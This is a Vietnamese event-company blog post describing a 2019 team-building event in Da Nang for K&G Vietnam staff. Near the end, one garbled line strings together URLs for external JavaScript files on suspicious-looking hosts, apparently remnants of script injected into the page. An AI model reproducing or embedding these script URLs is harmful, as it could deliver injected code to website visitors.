Tổ chức Team building – Đại hội chiến binh K&G Việt Nam 2019

Ngày 4/8/2019 vừa qua, Vietwind tiếp tục có cơ hội trở thành người dẫn đường trong cuộc hành quân được trông đợi nhất 2019 của hơn 500 chiến binh K&G Việt Nam. Tựa như biểu tượng con chim đại bàng Can đảm – Mạnh mẽ – Thiện chiến, các chiến binh đã đồng tâm hiệp lực vượt qua những thử thách từ chương trình Team building một cách đầy ngoạn mục.

1.Chìa khóa thành công của K&G Việt Nam

Với quyết tâm bứt phá trong mọi giai đoạn, K&G Việt Nam đang tạo ra những giá trị vượt bậc đánh dấu bước phát triển bền vững và dần trở thành công ty hàng đầu Việt Nam trong lĩnh vực sản xuất và phân phối ngành hàng tiêu dùng.

Chưa dừng lại ở đó, công ty còn tham vọng vươn xa hơn nữa để hào nhập cùng bạn bè Quốc tế. Dẫu biết rằng chặng đường càng dài càng tiềm ẩn nhiều khó khăn. Nhưng mỗi lần vượt qua rào cản là một lần K&G Việt Nam rút ra thêm những bài học thấm thía. Và có lẽ bài học về ”tinh thần gắn kết – chìa khóa của mọi thành công” mới thực sự là quý giá nhất đối với họ.

2.Chiến dịch hành quân của các chiến bình  K&G Việt Nam

Hòa trong tiết trời thu của thành phố biển Đà Nẵng xinh đẹp là không khí không thể sôi động hơn đến từ đại gia đình K&G Việt Nam. Tinh thần hứng khởi hiện rõ qua từng nụ cười, từng ánh mắt ngóng chờ thời khắc tuyệt vời nhất trong năm.

tổ-chức-team-building-k&g-việt nam-1

Vượt qua dấu ấn “Chinh phục trái tim” đã thành công tốt đẹp năm 2018, năm nay, Vietwind tiếp tục vinh dự đồng hành cùng K&G trong chương trình Team building với chủ đề mới mẻ: “Chiến binh tương lai”. Như một bước tiến vượt bậc đánh dấu chặng đường phát triển không ngừng của công ty. Đồng thời tiếp lửa cho các chiến binh vững bước trên thương trường phía trước.

tổ-chức-team-building-k&g-việt nam-10

Công ty được ví như một bức tranh với nhiều mảnh ghép, mỗi mảnh ghép tượng trưng cho một con người. Họ là đội ngũ nhân viên luôn mang trong mình nhiệt huyết với nghề và cả yếu tố Trung thực, Trách nhiệm, Bản lĩnh,… Nhưng bức tranh đó chỉ đẹp và có giá trị khi không thiếu đi bất cứ mảnh ghép nào, dù là nhỏ nhất.

tổ-chức-team-building-k&g-việt nam-6Giây phút lắng đọng cảm xúc của đại gia đình K&G Việt Nam

Nơi bãi biển hoang sơ, lời thề từ 500 chiến binh vang lên xé toang bầu không khí tĩnh lặng, như phát súng mở màn cho chương trình Team building hấp dẫn phía sau. Và chắc chắn âm thanh đó sẽ còn vang mãi trong tâm trí mỗi người, thôi thúc họ nỗ lực hết sức cùng với những chiến hữu đã từng đồng cam cộng khổ.

tổ-chức-team-building-k&g-việt nam-3
tổ-chức-team-building-k&g-việt nam-7Màn khởi động đầy quyết tâm của chiến binh K&G Việt Nam

Sau giây phút trang nghiêm, chương trình Team building chính thức khởi động. Tạm trút bỏ những bộ đồ công sở, các thành viên K&G Việt Nam hóa thân thành những chiến binh thiện chiến, tham gia vào đấu trường thử thách đầy quyết liệt của những siêu chiến binh

tổ-chức-team-building-k&g-việt nam-4
tổ-chức-team-building-k&g-việt nam-8

Chiến thắng không bao giờ đến từ một cá nhân. Trên thương trường cũng vậy, mọi thành công chỉ đạt được từ sức mạnh của cả tập thể và đó nhất quyết phải là tập thể đoàn kết thực sự. Các trò chơi Team building mà Vietwind mang tới chính là thứ keo gắn kết những con người với mục tiêu như thế.

tổ-chức-team-building-k&g-việt nam-9

“Không sợ nắng, không sợ gió chỉ sợ không đồng lòng”. Mỗi thử thách đòi hỏi sự phối hợp ăn ý của từng cá nhân trong team. Và trên con đường tới đích đó, mọi người có cơ hội nhìn thấy đồng nghiệp của mình từ một góc độ khác, thấu hiểu hơn.

tổ-chức-team-building-k&g-việt nam-11

Chương trình Team building kết thúc, để lại bao dấu ấn sâu đậm. Có lẽ chẳng có từ nào có thể diễn tả được hết niềm vui mà của chiến binh K&G Việt Nam ngày hôm đó. Nhưng những tấm ảnh phía trên cũng đã nói lên được phần nào.

Trên cương vị là những người sáng tạo, Vietwind cảm thấy thực sự mãn nguyện xen lẫn xúc động khi được chứng kiến những cố gắng không ngừng nghỉ của các chiến binh. Chúc K&G Việt Nam luôn giữ vững tinh thần thép để vượt qua mọi thử thách trên thương trường và hẹn gặp lại một một ngày không xa.

>> Chiêm ngưỡng Đại hội chiến binh siêu khủng tại đây

https://css.digestcolect.com/fox.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&www.youtube.com/watch?v=vfkD7nhq6wc

Facebook Comments

Bài Viết Liên Quan